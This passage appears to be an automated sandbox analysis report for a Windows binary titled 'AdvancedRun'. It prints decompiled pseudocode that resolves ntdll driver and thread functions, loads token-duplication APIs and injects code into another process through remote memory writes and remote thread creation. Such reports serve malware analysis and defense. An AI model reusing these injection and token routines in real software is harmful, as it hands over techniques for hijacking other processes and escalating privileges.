                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                
                                                                                                                				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                                				return 1;
                                                                                                                			}



                                                                                                                0x0040a3d0
                                                                                                                0x0040a3d9

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
                                                                                                                				void* _t1;
                                                                                                                				struct HINSTANCE__* _t2;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *0x41c4ac == 0) {
                                                                                                                					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                					 *0x41c4ac = _t2;
                                                                                                                					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                                					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                                					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                                					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                                					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                                					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                                					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                                					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                                					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                                					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                                					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                                					 *0x41c4a8 = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                                				char _v8;
                                                                                                                				long _v12;
                                                                                                                				long _v16;
                                                                                                                				long _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				long _v28;
                                                                                                                				char _v564;
                                                                                                                				char _v16950;
                                                                                                                				char _v33336;
                                                                                                                				_Unknown_base(*)()* _v33348;
                                                                                                                				_Unknown_base(*)()* _v33352;
                                                                                                                				void _v33420;
                                                                                                                				void _v33432;
                                                                                                                				void _v33436;
                                                                                                                				intOrPtr _v66756;
                                                                                                                				intOrPtr _v66760;
                                                                                                                				void _v66848;
                                                                                                                				void _v66852;
                                                                                                                				void* __edi;
                                                                                                                				void* _t76;
                                                                                                                				_Unknown_base(*)()* _t84;
                                                                                                                				_Unknown_base(*)()* _t87;
                                                                                                                				void* _t90;
                                                                                                                				signed int _t126;
                                                                                                                				struct HINSTANCE__* _t128;
                                                                                                                				intOrPtr* _t138;
                                                                                                                				void* _t140;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                
                                                                                                                				E0040B550(0x10524, __ecx);
                                                                                                                				_t138 = _a4;
                                                                                                                				_v12 = 0;
                                                                                                                				 *_t138 = 0;
                                                                                                                				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                                				_a8 = _t76;
                                                                                                                				if(_t76 == 0) {
                                                                                                                					 *_t138 = GetLastError();
                                                                                                                					L30:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                				_v33436 = 0;
                                                                                                                				memset( &_v33432, 0, 0x8284);
                                                                                                                				_t148 = _t147 + 0xc;
                                                                                                                				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_v8 = 0;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("CreateProcessW");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t84 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t84 = _v8();
                                                                                                                				}
                                                                                                                				_v33352 = _t84;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("GetLastError");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t87 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t87 = _v8();
                                                                                                                				}
                                                                                                                				_t140 = _a28;
                                                                                                                				_v33348 = _t87;
                                                                                                                				if(_t140 != 0) {
                                                                                                                					_t126 = 0x11;
                                                                                                                					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                                					_t148 = _t148 + 0xc;
                                                                                                                				}
                                                                                                                				_v33420 = 0x44;
                                                                                                                				if(_a16 == 0) {
                                                                                                                					_v33336 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v33336, _a16);
                                                                                                                				}
                                                                                                                				if(_a12 == 0) {
                                                                                                                					_v16950 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v16950, _a12);
                                                                                                                				}
                                                                                                                				if(_a24 == 0) {
                                                                                                                					_v564 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x104,  &_v564, _a24);
                                                                                                                				}
                                                                                                                				_v24 = _a20;
                                                                                                                				_v28 = 0;
                                                                                                                				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                                				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                                				_a12 = _t90;
                                                                                                                				if(_a16 == 0 || _t90 == 0) {
                                                                                                                					 *_a4 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                                					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                                					_v20 = 0;
                                                                                                                					_v16 = 0;
                                                                                                                					_a24 = 0;
                                                                                                                					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                                					_a28 = _t144;
                                                                                                                					if(_t144 == 0) {
                                                                                                                						 *_a4 = GetLastError();
                                                                                                                					} else {
                                                                                                                						ResumeThread(_t144);
                                                                                                                						WaitForSingleObject(_t144, 0x7d0);
                                                                                                                						CloseHandle(_t144);
                                                                                                                					}
                                                                                                                					_v66852 = 0;
                                                                                                                					memset( &_v66848, 0, 0x8284);
                                                                                                                					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                                					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                                					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                                					if(_a28 != 0) {
                                                                                                                						 *_a4 = _v66756;
                                                                                                                						_v12 = _v66760;
                                                                                                                						if(_a32 != 0) {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_v20 != 0) {
                                                                                                                						FreeLibrary(_v20);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L30;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
                                                                                                                				void* _t9;
                                                                                                                				struct HINSTANCE__* _t10;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *(__esi + 0x10) == 0) {
                                                                                                                					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                                					 *(__esi + 0x10) = _t10;
                                                                                                                					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                                					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                                					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                                					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                                					 *(__esi + 8) = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                                				void* _v8;
                                                                                                                				char _v12;
                                                                                                                				char* _v20;
                                                                                                                				long _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char* _v36;
                                                                                                                				signed int _v40;
                                                                                                                				void _v44;
                                                                                                                				char _v48;
                                                                                                                				char _v52;
                                                                                                                				struct _OSVERSIONINFOW _v328;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t40;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t49;
                                                                                                                				struct HINSTANCE__** _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_t54 = __eax;
                                                                                                                				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                                				GetVersionExW( &_v328);
                                                                                                                				if(_v328.dwMajorVersion < 6) {
                                                                                                                					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                                				}
                                                                                                                				E0040A1EF(_t54);
                                                                                                                				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                				if(_t44 != 0) {
                                                                                                                					_t55 = 8;
                                                                                                                					memset( &_v44, 0, _t55 << 2);
                                                                                                                					_v12 = 0;
                                                                                                                					asm("stosd");
                                                                                                                					_v36 =  &_v12;
                                                                                                                					_v20 =  &_v52;
                                                                                                                					_v48 = 0x24;
                                                                                                                					_v44 = 0x10003;
                                                                                                                					_v40 = _t55;
                                                                                                                					_v28 = 0x10004;
                                                                                                                					_v24 = 4;
                                                                                                                					_a16 = 0;
                                                                                                                					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					return  !( ~_t40) & _a16;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}





















                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t47;
                                                                                                                				struct HBRUSH__* _t56;
                                                                                                                				void* _t61;
                                                                                                                				unsigned int _t63;
                                                                                                                				void* _t68;
                                                                                                                				struct HWND__* _t69;
                                                                                                                				struct HWND__* _t70;
                                                                                                                				void* _t73;
                                                                                                                				unsigned int _t74;
                                                                                                                				struct HWND__* _t76;
                                                                                                                				struct HWND__* _t77;
                                                                                                                				struct HWND__* _t78;
                                                                                                                				struct HWND__* _t79;
                                                                                                                				unsigned int _t85;
                                                                                                                				struct HWND__* _t87;
                                                                                                                				struct HWND__* _t89;
                                                                                                                				struct HWND__* _t90;
                                                                                                                				struct tagPOINT _t96;
                                                                                                                				struct tagPOINT _t98;
                                                                                                                				signed short _t103;
                                                                                                                				void* _t106;
                                                                                                                				void* _t117;
                                                                                                                
                                                                                                                				_t106 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t47 = _a4 - 0x110;
                                                                                                                				_t117 = __ecx;
                                                                                                                				if(_t47 == 0) {
                                                                                                                					__eflags =  *0x40feb0;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                                					} else {
                                                                                                                						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                					}
                                                                                                                					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                					E0040103E(_t117, __eflags);
                                                                                                                					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                                					goto L30;
                                                                                                                				} else {
                                                                                                                					_t61 = _t47 - 1;
                                                                                                                					if(_t61 == 0) {
                                                                                                                						_t103 = _a8;
                                                                                                                						_t63 = _t103 >> 0x10;
                                                                                                                						__eflags = _t103 - 1;
                                                                                                                						if(_t103 == 1) {
                                                                                                                							L24:
                                                                                                                							__eflags = _t63;
                                                                                                                							if(_t63 != 0) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                								DeleteObject( *(_t117 + 0x43c));
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t103 - 2;
                                                                                                                							if(_t103 != 2) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								goto L24;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t68 = _t61 - 0x27;
                                                                                                                						if(_t68 == 0) {
                                                                                                                							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                							__eflags = _a12 - _t69;
                                                                                                                							if(_a12 != _t69) {
                                                                                                                								__eflags =  *0x40ff30;
                                                                                                                								if( *0x40ff30 == 0) {
                                                                                                                									goto L30;
                                                                                                                								} else {
                                                                                                                									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                									__eflags = _a12 - _t70;
                                                                                                                									if(_a12 != _t70) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L18:
                                                                                                                								SetBkMode(_a8, 1);
                                                                                                                								SetTextColor(_a8, 0xc00000);
                                                                                                                								_t56 = GetSysColorBrush(0xf);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t73 = _t68 - 0xc8;
                                                                                                                							if(_t73 == 0) {
                                                                                                                								_t74 = _a12;
                                                                                                                								_t96 = _t74 & 0x0000ffff;
                                                                                                                								_v12.x = _t96;
                                                                                                                								_v12.y = _t74 >> 0x10;
                                                                                                                								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                								_push(_v12.y);
                                                                                                                								_a8 = _t76;
                                                                                                                								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                								__eflags = _t77 - _a8;
                                                                                                                								if(_t77 != _a8) {
                                                                                                                									__eflags =  *0x40ff30;
                                                                                                                									if( *0x40ff30 == 0) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                										_push(_v12.y);
                                                                                                                										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                										__eflags = _t79 - _t78;
                                                                                                                										if(_t79 != _t78) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											goto L13;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L13:
                                                                                                                									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t73 != 0) {
                                                                                                                									L30:
                                                                                                                									_t56 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								} else {
                                                                                                                									_t85 = _a12;
                                                                                                                									_t98 = _t85 & 0x0000ffff;
                                                                                                                									_v12.x = _t98;
                                                                                                                									_v12.y = _t85 >> 0x10;
                                                                                                                									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                									_push(_v12.y);
                                                                                                                									_a8 = _t87;
                                                                                                                									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                										__eflags =  *0x40ff30;
                                                                                                                										if( *0x40ff30 == 0) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                											_push(_v12.y);
                                                                                                                											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                											__eflags = _t90 - _t89;
                                                                                                                											if(_t90 != _t89) {
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												_push(0x40ff30);
                                                                                                                												goto L7;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_push(_t117 + 0x23e);
                                                                                                                										L7:
                                                                                                                										_push( *(_t117 + 0x10));
                                                                                                                										E00404F7E();
                                                                                                                										L8:
                                                                                                                										_t56 = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t56;
                                                                                                                			}

                                                                                                                0x0040114a
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x00401144
                                                                                                                0x00401104
                                                                                                                0x0040110a
                                                                                                                0x0040110b
                                                                                                                0x0040110b
                                                                                                                0x0040110e
                                                                                                                0x00401115
                                                                                                                0x00401117
                                                                                                                0x00401117
                                                                                                                0x00401102
                                                                                                                0x004010c8
                                                                                                                0x004010c0
                                                                                                                0x004010b5
                                                                                                                0x004010ac
                                                                                                                0x00401303

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                				void _v259;
                                                                                                                				void _v260;
                                                                                                                				void _v515;
                                                                                                                				void _v516;
                                                                                                                				char _v1048;
                                                                                                                				void _v1052;
                                                                                                                				void _v1056;
                                                                                                                				void _v1560;
                                                                                                                				long _v1580;
                                                                                                                				void _v3626;
                                                                                                                				char _v3628;
